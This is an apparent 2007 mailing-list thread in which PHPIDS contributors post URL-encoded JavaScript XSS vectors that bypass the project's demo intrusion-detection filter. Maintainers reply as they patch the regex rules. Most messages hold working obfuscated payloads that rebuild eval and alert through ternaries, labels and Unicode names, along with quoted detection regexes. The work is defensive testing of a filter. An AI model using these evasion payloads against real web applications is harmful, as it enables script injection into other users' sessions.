> a ternary operator based injection:http://demo.php-ids.org/?test=%61%3D%31%3D%3D%31%3F%31%3D%3D%31%2E%3F...

[xorrer]

Basic concept still works.

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%6C%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%2B%27%65%76%61%27%2B%79%2E%79%3B%6E%3D%2E%31%5B%78%5D%3B%7B%7D%3B%3B%0D%0A%6F%3D%27%27%2B%7A%2B%22%61%6C%65%72%22%2B%7A%2B%22%74%28%78%29%22%3B%0D%0A%6E%28%6F%29%3B

Xorrer

On Sep 15, 10:19 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> Displays cookie and the string XSS (based on thornmakers and kishords
> work. thanks for the x='eval';n=0.[x] trick)
>

> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...

>
> Just some other stuff, again tested on Opera. Nothing special just
> something to mess up the page a little.
>

> http://demo.php-ids.org/?test=%5F%3D%31%3B%7B%7A%20%3D%28%5F%29%3F%22...
>
> http://demo.php-ids.org/?test=%70%61%67%65%2E%72%65%6D%6F%76%65%4E%6F...

[Mario Heiderich]

Nice one, xorrer! Your first ones i fixed on accident while working on thornmakers and kishors examples but the second one came unexpected ;) I did a slight modification on the converter to fix it. Thx!

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

It's still possible

http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%2B%7B%7D%2B%7B%7D%2B%7B%7D%3B%0D%0A%7B%7D%3B%3B%0D%0A%7B%76%20%3D%28%30%29%3F%7A%3A%7A%7D%76%3D%7B%5F%24%3A%7A%2B%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%7B%6B%20%3D%28%30%29%3F%7A%3A%7A%7D%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%78%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%7B%7D%3B%0D%0A%0D%0A%6E%3D%2E%31%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

On Sep 15, 12:15 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Nice one, xorrer! Your first ones i fixed on accident while working on
> thornmakers and kishors examples but the second one came unexpected ;) I did
> a slight modification on the converter to fix it. Thx!
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > Basic concept still works.
>
> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

[Mario Heiderich]

Well - I think i got it this time ;)

@xorrer: I'd like to add you to the credits page - you want to be mentioned as xorrer or with your full name? You have a website you want to link your name to?

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

@mario

Thanks. You can just list me up as xorrer, no webpage to link to.

On Sep 15, 3:34 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Well - I think i got it this time ;)
>
> @xorrer: I'd like to add you to the credits page - you want to be mentioned
> as xorrer or with your full name? You have a website you want to link your
> name to?
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:
>
>
>
>
>
>
>
> > It's still possible
>
> >http://demo.php-ids.org/?test=%3B%7B%7A%20%3D%28%31%29%3F%22%22%3A%61...

[xorrer]

oh... and btw it still works. and this time i took the time to clean
up the vector a little

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%3B%0D%0A%7B%76%20%3D%28%30%29%3F%7A%3A%7A%7D%76%3D%7B%5F%24%3A%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%74%3D%7B%5F%24%24%24%3A%7A%2B%22%58%53%53%27%65%64%20%61%67%69%6E%22%2B%7A%7D%3B%0D%0A%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%74%2E%5F%24%24%24%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%0D%0A%6E%3D%2E%30%30%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

[Mario Heiderich]

Argh - one second after the release ;)

2007/9/15, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

Still works along the same lines

http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D%7B%79%20%3D%28%31%29%3F%7B%79%3A%20%27%65%76%61%27%2B%7A%7D%3A%7B%79%3A%20%27%6C%27%2B%7A%2E%7A%7D%7D%78%3D%27%27%2B%7A%3B%0D%0A%0D%0A%76%3D%7B%5F%24%3A%7A%2B%27%61%6C%65%72%27%2B%7A%7D%3B%0D%0A%74%3D%7B%5F%24%24%24%3A%7A%2B%22%58%53%53%27%65%64%20%61%67%69%6E%20%66%72%6F%6D%20%6F%75%74%65%72%2A%73%70%61%63%65%2A%22%2B%7A%7D%3B%0D%0A%6B%3D%7B%5F%24%24%3A%76%2E%5F%24%2B%27%74%28%74%2E%5F%24%24%24%29%27%2B%7A%7D%3B%0D%0A%78%3D%27%27%2B%79%2E%79%2B%27%6C%27%3B%0D%0A%6E%3D%2E%31%20%5B%78%5D%3B%0D%0A%6E%28%6B%2E%5F%24%24%29

On Sep 15, 6:10 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Argh - one second after the release ;)
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
>
>
> > oh... and btw it still works. and this time i took the time to clean
> > up the vector a little
>

> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

[Mario Heiderich]

Well - this issue seems to be way harder to solve than i originally thought.

2007/9/15, xorrer <obhvsb...@gmail.com>:

php-ids.org

[thornmaker]

nice work xorrer!
here's another ternary one to add to the mix:
http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27%3A%30%3B%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%6C%27%2B%7A%3A%30%3B%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%65%76%61%27%2B%61%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%62%73%74%72%28%31%29%27%2B%7A%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%61%73%68%2E%73%75%27%2B%62%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%74%69%6F%6E%2E%68%27%2B%62%3A%30%3B%62%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%6C%6F%63%61%27%2B%62%3A%30%3B%63%3D%28%30%5B%61%5D%29%3B%64%3D%28%63%28%62%29%29%3B%63%28%64%29#alert%28%27%65%5E%28%69%2A%70%69%29%3D%2D%31%27%29

On Sep 15, 12:53 pm, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> Well - this issue seems to be way harder to solve than i originally thought.
>

> 2007/9/15, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
> > Still works along the same lines
>

> >http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D...

> --
> _______________________
> php-ids.org

[xorrer]

Good stuff thornmaker.

Those ternary ones are though to prevent

I have a vector which fails by just one character. But I would like to
share it anyway.

http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%27%2C%5D%3B%63%3D%5B%62%2B%27%6C%27%2C%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%27%2C%5D%3B%65%3D%5B%64%2B%27%74%28%27%2C%5D%3B%0D%0A%66%3D%5B%65%2B%27%63%25%32%39%27%2C%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%29

If you remove the closing bracket. It passes the IDS, but then the
eval won't work.

And with my setup there is no way to escape this regex _START_,.+=.+
(\?|,).*\)_END_ or am I wrong?

On Sep 15, 9:00 pm, thornmaker <thornma...@gmail.com> wrote:
> nice work xorrer!

> here's another ternary one to add to the mix:http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27...

[xorrer]

here are two other vectors.

http://demo.php-ids.org/?test=%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%27%3A%30%3B%0D%0A%62%3D%28%61%2B%27%65%76%61%5C%0D%0A%27%29%3B%62%3D%28%62%2B%27%6C%5C%0D%0A%27%29%3B%0D%0A%64%3D%28%61%2B%27%58%53%53%5C%0D%0A%27%29%3B%0D%0A%63%3D%28%61%2B%27%61%6C%65%72%5C%0D%0A%27%29%3B%63%3D%28%63%2B%27%74%28%64%29%5C%0D%0A%27%29%3B%24%3D%2E%30%5B%62%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%63%29

http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62%3D%5B%61%2B%27%65%76%61%5C%0D%0A%27%5D%3B%63%3D%5B%62%2B%27%6C%5C%0D%0A%27%5D%3B%64%3D%5B%61%2B%27%61%6C%65%72%5C%0D%0A%27%5D%3B%65%3D%5B%64%2B%27%74%28%5C%0D%0A%27%5D%3B%0D%0A%66%3D%5B%65%2B%27%31%29%5C%0D%0A%27%5D%3B%0D%0A%66%2E%66%3D%5B%65%2B%27%31%29%5C%0D%0A%27%5D%3B%0D%0A%24%3D%2E%31%5B%63%5D%3B%0D%0A%61%3D%24%3B%0D%0A%61%28%66%2E%66%5B%30%5D%29

On Sep 15, 11:31 pm, xorrer <obhvsbypqg...@gmail.com> wrote:
> Good stuff thornmaker.
>
> Those ternary ones are though to prevent
>
> I have a vector which fails by just one character. But I would like to
> share it anyway.
>

> http://demo.php-ids.org/?test=%61%3D%5B%27%27%2C%5D%3B%0D%0A%62%3D%5B...

[Mario Heiderich]

Nice! The third one from xorrer pointed out a stupid but dangerous bug
in the rules - which is now fixed.

On Sep 16, 2:44 am, xorrer <obhvsbypqg...@gmail.com> wrote:
> here are two other vectors.
>

> http://demo.php-ids.org/?test=%61%3D%2F%61%2F%21%3D%2F%61%2F%3F%27%27...
>
> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62...

[Mario Heiderich]

Hmmm - results in an impact of 2. I consider this as appropriate.

2007/9/16, xorrer <obhvsb...@gmail.com>:

<code>asd</code>

On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>

[xorrer]

Here is another one.

Copy/Paste the vector from here http://phpfi.com/263258

On Sep 16, 4:18 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:

[xorrer]

On Sep 16, 7:35 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Hmmm - results in an impact of 2. I consider this as appropriate.
>

> 2007/9/16, xorrer <obhvsbypqg...@gmail.com>:
> <code>asd</code>

That wasn't actually a vector only a test if the <code> tag can be
used in postings. Man this post was only up 2 seconds how did u manage
to catch it

> --
> _______________________
> php-ids.org

[xorrer]

Or us this url instead of copy pasting from the above url. As i now
managed to urlencode it properly

http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%21%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb%3D%28%C3%A4%2B%27eva%27%2B%C3%A4%29%3Bb%3D%28b%2B%27l%27%2B%C3%A4%29%3Bd%3D%28%C3%A4%2B%27XSS%27%2B%C3%A4%29%3Bc%3D%28%C3%A4%2B%27aler%27%2B%C3%A4%29%3Bc%3D%28c%2B%27t%28d%29%27%2B%C3%A4%29%3B%24%3D.0%5Bb%5D%3Ba%3D%24%3Ba%28c%29

[Mario Heiderich]

Actually I'm a bot. *kidding*
No - just a coincidence :)

2007/9/16, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[Martin Hinks]

Mario > *

Those vectors are really great xorrer - many many thanks!

Martin

[Mario Heiderich]

Yep - they are and they are furthermore really helpful to point out bugs in the rules. The last examples used the fact that you can use $ as label in JS (we had that earlier) which i plain forgot in several rules.

Awesome stuff!

2007/9/16, Martin Hinks <mhi...@gmail.com>:

> http://demo.php-ids.org/?test=%7A%3D%2F%7A%2F%21%3D%2F%7A%2F%3F%27%27. ..

--
_______________________
php-ids.org

[Martin Hinks]

Hey Mario, something I just noticed:

a = eval;a(test);

scores nothing and performs an eval on test...

a=eval;a(test);

(without the spaces) scores an impact of 5.

Might want to fix the rule so that spaces are included and raise the
same impact...

M

[Mario Heiderich]

@Martin: Thanks - but I know. If I'd fix that we'd generate tons of false alerts. I've been struggling with the JS property rules for some time (the ones starting with (?:[^$\w\/-\s](?: ).

Maybe they will be removed soon but there's lots of testing needed before...

2007/9/16, Martin Hinks <mhi...@gmail.com>:

> http://demo.php-ids.org/?test=%61%3D%5B%27%5C%0D%0A%27%5D%3B%0D%0A%62 .
> > > > > > ..
> > > > >

> http://demo.php-ids.org/?test=%7B%7A%20%3D%28%31%29%3F%22%22%3A%61%7D .

--
_______________________
php-ids.org

[Martin Hinks]

Ok... well, something to think about!

Btw:

function x () { alert(1) }; x();

Can't believe that isn't detected!

Have fun!

[Martin Hinks]

Damn - must have caught you between rule changes - knew it was too easy :p

M

[Mario Heiderich]

Yep - rules were temporarily not at full strength, sry.

in Hinks <mhi...@gmail.com>:

php-ids.org

[xorrer]

Same stuff.

http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb%3D%28%C3%A4%2B%27eva%27%2B%C3%A4%29%3Bb%3D%28b%2B%27l%27%2B%C3%A4%29%3Bd%3D%28%C3%A4%2B%27XSS%27%2B%C3%A4%29%3Bc%3D%28%C3%A4%2B%27aler%27%2B%C3%A4%29%3Bc%3D%28c%2B%27t%28d%29%27%2B%C3%A4%29%3B%C3%A4%3D.0%5Bb%5D%3B%C3%A4%28c%29

On Sep 16, 8:39 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Yep - rules were temporarily not at full strength, sry.
>
> in Hinks <mhi...@gmail.com>:
>
>
>
>
>
> > Damn - must have caught you between rule changes - knew it was too easy :p
>
> > M
>
> > On 9/16/07, Martin Hinks <mhi...@gmail.com> wrote:
> > > Ok... well, something to think about!
>
> > > Btw:
>
> > > function x () { alert(1) }; x();
>
> > > Can't believe that isn't detected!
>
> > > Have fun!
>
> > > M
>

> > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > @Martin: Thanks - but I know. If I'd fix that we'd generate tons of
> > false
> > > > alerts. I've been struggling with the JS property rules for some time
> > (the
> > > > ones starting with (?:[^$\w\/-\s](?: ).
>
> > > > Maybe they will be removed soon but there's lots of testing needed
> > before...
>
> > > > 2007/9/16, Martin Hinks <mhi...@gmail.com>:
>
> > > > > Hey Mario, something I just noticed:
>
> > > > > a = eval;a(test);
>
> > > > > scores nothing and performs an eval on test...
>
> > > > > a=eval;a(test);
>
> > > > > (without the spaces) scores an impact of 5.
>
> > > > > Might want to fix the rule so that spaces are included and raise the
> > > > > same impact...
>
> > > > > M
>

> > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com> wrote:
> > > > > > Yep - they are and they are furthermore really helpful to point
> > out bugs
> > > > in
> > > > > > the rules. The last examples used the fact that you can use $ as
> > label
> > > > in JS
> > > > > > (we had that earlier) which i plain forgot in several rules.
>
> > > > > > Awesome stuff!
>
> > > > > > 2007/9/16, Martin Hinks < mhi...@gmail.com>:
>
> > > > > > > Mario > *
>
> > > > > > > Those vectors are really great xorrer - many many thanks!
>
> > > > > > > Martin
>

> > > > > > > On 9/16/07, Mario Heiderich <mario.heider...@googlemail.com>

> > wrote:
> > > > > > > > Actually I'm a bot. *kidding*
> > > > > > > > No - just a coincidence :)
>

> > > > > > > > 2007/9/16, xorrer <obhvsbypqg...@gmail.com>:

> ...
>
> read more »

[Martin Hinks]

Ok, got one for real now :p

b = (x());
$ = .0[b];a=$;
a( h() );
function x () { return 'eva' + p(); };
function p() { return 'l' ; };
function h() { return 'aler' + i(); };
function i() { return 't (123456)' ; };

Enjoy ;)

M

[Mario Heiderich]

It's absolutely impressive that JavaScript accepts Unicode as labels - you can even do stuff like:

ł = alert;
ł(1)

That combined with the fact that \w doesn't match those chars and \p isn't really an option due to compatibility sakes makes more rules discussable than i thought before. Damn JavaScript ;)

2007/9/16, Martin Hinks <mhi...@gmail.com>:

--
_______________________
php-ids.org

[christ1an]

Actually we can inject arbitrary js code at the moment since we can
bake all js functions and every single char using this kind of vector:

http://phpfi.com/263306

If we have functions such as eval, decodeURIComponent, replace or
String.fromCharCode, we can do pretty much what we want, I guess.

Anyway, nothing of this really has todo with intrusion detection. Its
just circumventing a blacklist filter and hope that the browser
executes it.

I'll leave that for tomorrow.

- christ1an

am Sonntag, 16. September 2007 um 21:56 schrieben Sie:

[thornmaker]

I was wondering if the rule descriptions were up to date... My
injections are being blocked by:

(?:[":;,]\s*[)}\]]+)
finds closing JavaScript breaker including whitespace attacks

however they do not visually appear to match this rule. For
example...

a='';b

gets through fine, but

a='';b=

gets blocked by this rule... which just doesn't seem right.
perhaps I am too tired to be thinking clearly... I'll look again in
the morning.

all is not lost... this one gets through...
http://demo.php-ids.org/?test=%61%3D%27%27%0A%62%3D%66%61%6C%73%65%3F%30%3A%27%65%76%61%27%0A%62%2B%3D%66%61%6C%73%65%3F%30%3A%27%6C%27%0A%63%3D%66%61%6C%73%65%3F%30%3A%27%6C%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%6F%63%61%74%69%6F%6E%2E%68%61%73%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%68%2E%73%75%62%73%74%27%0A%63%2B%3D%66%61%6C%73%65%3F%30%3A%27%72%28%31%29%27%0A%64%3D%28%30%5B%62%5D%0A%29%0A%64%28%64%28%63%0A%29%0A%29#alert%28%27avast%21%27%29

[xorrer]

On Sep 17, 1:27 am, christ1an <ch0...@googlemail.com> wrote:
> Actually we can inject arbitrary js code at the moment since we can
> bake all js functions and every single char using this kind of vector:

Yep, that unicode stuff I stumpled upon yesterday with variable names
like 'ä', will cause some problems.

> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it.

I don't really understand this statement. So you don't consider XSS
attacks to be something which PHPIDS should detect. Then what is an
IDS for a wepapp supposed to find, if XSS doesn't fall into ID?

On Sep 17, 1:27 am, christ1an <ch0...@googlemail.com> wrote:
> Actually we can inject arbitrary js code at the moment since we can
> bake all js functions and every single char using this kind of vector:
>
> http://phpfi.com/263306
>
> If we have functions such as eval, decodeURIComponent, replace or
> String.fromCharCode, we can do pretty much what we want, I guess.
>
> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it.
>
> I'll leave that for tomorrow.
>
> - christ1an
>
> am Sonntag, 16. September 2007 um 21:56 schrieben Sie:
>
>
>
> > Ok, got one for real now :p
> > b = (x());
> > $ = .0[b];a=$;
> > a( h() );
> > function x () { return 'eva' + p(); };
> > function p() { return 'l' ; };
> > function h() { return 'aler' + i(); };
> > function i() { return 't (123456)' ; };
> > Enjoy ;)
> > M

> > On 9/16/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
> >> Same stuff.
>
> >>http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+0%3Bb...

> ...
>
> read more

[Mario Heiderich]

> Anyway, nothing of this really has todo with intrusion detection. Its
> just circumventing a blacklist filter and hope that the browser
> executes it

I think it this thread is very important either for the PHPIDS and for
the readers. Personally speaking I haven't learned that much about XSS
and JS in general since a very long time. Starting with the XML
predicates, Unicode labels, the weirdest concatenations, anonymous
methods put together in ways one would never expect them to execute
and so on. (we should assemble a paper about that!!!)

The filter rules before starting this thread had a size of 26372 bytes
and detected none of the listed vectors - now the have a size of 24259
bytes and are able to detect any of the listed ones. Sure - after this
storm has slowed down there will be much work to fix false positives -
in fact I fixed several ones yesterday evening - but that is plainly
the evolution the PHPIDS has to go through.

In my eyes any new submission is greatly appreciated and very much
helps the system in getting better. What do you think?

> ...
>
> Erfahren Sie mehr

[Martin Hinks]

This process is absolutely crucial for the IDS! It is only through the
expert knowledge and time donated of people who really know what they
are doing when it comes to attacks that the blacklist-system can ever
be effective. Sure, there will always be new vectors, but this process
is the core of PHPIDS. Without excellent filter rules it's just a
glorified regex matching engine.

Martin

[Mario Heiderich]

100% agreement with martin!

Ah and btw: I added a new feature to the converter - small but maybe with strange results - so please excuse if the demo rules _might_ act a little bit weird. I am still testing... :)

2007/9/17, Martin Hinks <mhi...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

I worked out this http://groups.google.com/group/php-ids/msg/f1706c3ff2eeaf98
idea from Gareth.

http://demo.php-ids.org/?test=s1%3D%3Cs%3Eevalalerta%281%29a%3C%2Fs%3E%3B+s2%3D%3Cs%3E%3C%2Fs%3E%2B%27%27%3B+s3%3Ds1%2Bs2%3B+e1%3D%2Fs1%2F%3Fs3%5B0%5D%3As1%3B+e2%3D%2Fs1%2F%3Fs3%5B1%5D%3As1%3B+e3%3D%2Fs1%2F%3Fs3%5B2%5D%3As1%3B+e4%3D%2Fs1%2F%3Fs3%5B3%5D%3As1%3B+e%3D%2Fs1%2F%3F.0%5Be1%2Be2%2Be3%2Be4%5D%3As1%3B+a1%3D%2Fs1%2F%3Fs3%5B4%5D%3As1%3B+a2%3D%2Fs1%2F%3Fs3%5B5%5D%3As1%3B+a3%3D%2Fs1%2F%3Fs3%5B6%5D%3As1%3B+a4%3D%2Fs1%2F%3Fs3%5B7%5D%3As1%3B+a5%3D%2Fs1%2F%3Fs3%5B8%5D%3As1%3B+a6%3D%2Fs1%2F%3Fs3%5B10%5D%3As1%3B+a7%3D%2Fs1%2F%3Fs3%5B11%5D%3As1%3B+a8%3D%2Fs1%2F%3Fs3%5B12%5D%3As1%3B+a%3Da1%2Ba2%2Ba3%2Ba4%2Ba5%2Ba6%2Ba7%2Ba8%3Be%28a%29

On Sep 17, 10:10 am, "Mario Heiderich"

<mario.heider...@googlemail.com> wrote:
> 100% agreement with martin!
>
> Ah and btw: I added a new feature to the converter - small but maybe with
> strange results - so please excuse if the demo rules _might_ act a little
> bit weird. I am still testing... :)
>
> 2007/9/17, Martin Hinks <mhi...@gmail.com>:
>
>
>
>
>
> > This process is absolutely crucial for the IDS! It is only through the
> > expert knowledge and time donated of people who really know what they
> > are doing when it comes to attacks that the blacklist-system can ever
> > be effective. Sure, there will always be new vectors, but this process
> > is the core of PHPIDS. Without excellent filter rules it's just a
> > glorified regex matching engine.
>
> > Martin
>

> ...
>
> read more

[Martin Hinks]

Awesome use of the XML predicates!

Thanks xorrer!

M

[xorrer]

And this one is identical to the one I posted yesterday (http://
groups.google.com/group/php-ids/msg/70502a2b2f6c57b3) just enhanced by
a '.' and a few spaces here and there

http://demo.php-ids.org/?test=%C3%A4%3D%2F%C3%A4%2F%3F%27%27%3A+.0%3B+b%3D%28%C3%A4%2B%27eva%27%2B%C3%A4%29%3B+b%3D%28b%2B%27l%27%2B%C3%A4%29%3B+d%3D%28%C3%A4%2B%27XSS%27%2B%C3%A4%29%3B+c%3D%28%C3%A4%2B%27aler%27%2B%C3%A4%29%3B+c%3D%28c%2B%27t%28d%29%27%2B%C3%A4%29%3B+%C3%A4%3D.0%5Bb%5D+%3B%C3%A4%28c%29

On Sep 17, 10:57 am, "Martin Hinks" <mhi...@gmail.com> wrote:
> Awesome use of the XML predicates!
>
> Thanks xorrer!
>
> M
>

> On 9/17/07, xorrer <obhvsbypqg...@gmail.com> wrote:
>
>
>
>
>
> > I worked out thishttp://groups.google.com/group/php-ids/msg/f1706c3ff2eeaf98
> > idea from Gareth.
>
> >http://demo.php-ids.org/?test=s1%3D%3Cs%3Eevalalerta%281%29a%3C%2Fs%3...

> ...
>
> read more

[christ1an]

> I don't really understand this statement. So you don't consider XSS
> attacks to be something which PHPIDS should detect. Then what is an
> IDS for a wepapp supposed  to find, if XSS doesn't fall into ID?

Well, me as being one of the initial founders of PHPIDS do always have to keep our main objective in mind. In fact, with these kind of threads, we are loosing focus on that objective. What I am talking about is intrusion detection, a term that implies several aspects two of which are functionality in the sense of effectiveness and performance combined with simplicity.

We intend to recognize attacks against PHP written Web applications, neither vector recognizing nor a direct kind of attack prevention. The only exception concerning the latter would probably be modifying the IDS to be a IPS by just blocking malicious appearing requests. Be that as it may, its a different thing.

What we are currently doing is building totally weird (cool) javascript vectors that slip through our attack detection routine, simply due to their abstractness. Moreover, most of these vectors will only be executed if they are outputted directly within a <script> tag, not even within a variable within a <script> tag that would need to be broken off prior inserting the payload. I'd say at least as far as XSS is concerned, we are able to detect around about 95% of all attacks that are actually being performed on real environments; in practice.

Now lets go back to practice. I consider it highly unlikely that an attacker would try to perform an unnoticed attack against an application that he knows is running PHPIDS. If he doesn't assume that some kind of IDS is running, he'd just fire some trivial vectors to see first results, which of course would be detected. Nobody can tell me that an attacker would try such weird vectors we are talking about here in the beginning and on first try.

I hope you now understand my point that we are loosing focus. Nevertheless, I highly appreciate this input and we will of course continue to fix them in future. However, soon the point will be reached where we will have to decide whether or not it is necessary to modify and refine rules, considering our greatest enemy  - false positives.

You see, intrusion detection is - if done professionally - far away from being an easy job. Its pretty much all about calculating risks. Tough job.

> This process is absolutely crucial for the IDS! It is only through the
> expert knowledge and time donated of people who really know what they
> are doing when it comes to attacks that the blacklist-system can ever
> be effective. Sure, there will always be new vectors, but this process
> is the core of PHPIDS. Without excellent filter rules it's just a
> glorified regex matching engine.

Exactly. Right now, we are in a stage where this kind of input is >>needed<<. However time will come when we will go one step further to make the IDS effective in what it does. It's not a regex matching engine, you are perfectly right on that.

I also fully agree with Mario. I personally have learned a lot while developing PHPIDS and reading your feedback, bug reports and so forth. I'm sure everyone who participated shares this opinion.

So ultimately, lets just continue what we're doing; and more importantly lets do it professional.

- christ1an

2007/9/17, xorrer <obhvsb...@gmail.com>:

[xorrer]

Ok christ1an, now I understand what you meant. And I agree that the
PHPIDS probably already detects most of the attacks that matter for
real world applications.

Btw. I found this one
http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%C3%A4%281%29+%C2%BC%2Fscript%C2%BE.
But don't really know if it would work if the circumstances where
right (The US-ASCII problem, found by Kurt Huwig)

And there seems to be a problem with the acute accent "´". After
sending just that character in the answer it says
[codesnippet]<h3>found injection: &Acirc;&acute;</h3>[/codesnippet]

> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:

> ...
>
> read more

[Mario Heiderich]

Hi xorrer!

We once had a rule for that one but to be honest I didn't ever manage to get this one running. So i think this is ignorable. What do you think?

The accent/backtick is being detected when coming alone as SQL injection because it's a _very_ common pattern to just inject a quoting char. So I decided to add this pattern to the rules - It shouldn't create many false positives so I think we should keep it in.

Greetings,
.mario

2007/9/17, xorrer <obhvsb...@gmail.com>:

php-ids.org

[xorrer]

A agree on the first one.

But the second one wasn't about detecting the acute accent, which is
correct but the answer from PHPIDS.

Which includes &Acirc;&acute;, where does this &Acirc; come from.
That's what I meant

On Sep 17, 5:27 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Hi xorrer!
>
> We once had a rule for that one but to be honest I didn't ever manage to get
> this one running. So i think this is ignorable. What do you think?
>
> The accent/backtick is being detected when coming alone as SQL injection
> because it's a _very_ common pattern to just inject a quoting char. So I
> decided to add this pattern to the rules - It shouldn't create many false
> positives so I think we should keep it in.
>
> Greetings,
> .mario
>

> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:

>
>
>
>
>
> > Ok christ1an, now I understand what you meant. And I agree that the
> > PHPIDS probably already detects most of the attacks that matter for
> > real world applications.
>
> > Btw. I found this one
>

> >http://demo.php-ids.org/?test=%C2%BCscript%C2%BE+%C3%A4%3D+alert%2C+%...

> ...
>
> read more

[Mario Heiderich]

Ah now I get it. That should be some encoding issue on certain OS. The out is validated several times so some special chars may produce weird output like

found injection: ´

This is a demo-only issue and has nothing to with the PHPIDS. Btw - above is my output on Ubuntu 7.1 - on the WinXP VMs it looks completely different.

Grx,
.mario

2007/9/17, xorrer <obhvsb...@gmail.com>:

--
_______________________
php-ids.org

[xorrer]

Ah, ok.

http://demo.php-ids.org/?test=a%3C%2Ftd%3E%C3%A4%3C%2Ftr%3E%C3%A4%3C%2Ftable%3EPre-XSS%3F%3Cbr%3E%3Ch1%3EPre-XSS%3F%3C%2Fa%3E

Here an attribute breaking injection. Which also heavily messes up the
page for fun.

On Sep 17, 5:41 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:

> Ah now I get it. That should be some encoding issue on certain OS. The out
> is validated several times so some special chars may produce weird output
> like
> found injection: ´This is a demo-only issue and has nothing to with the
> PHPIDS. Btw - above is my output on Ubuntu 7.1 - on the WinXP VMs it looks
> completely different.
>
> Grx,
> .mario
>

> 2007/9/17, xorrer <obhvsbypqg...@gmail.com>:

> ...
>
> read more

[Mario Heiderich]

Yep - it works. <marguee> creates some funny output as well.

Nevertheless here's the copy of what i posted on slackers recently to
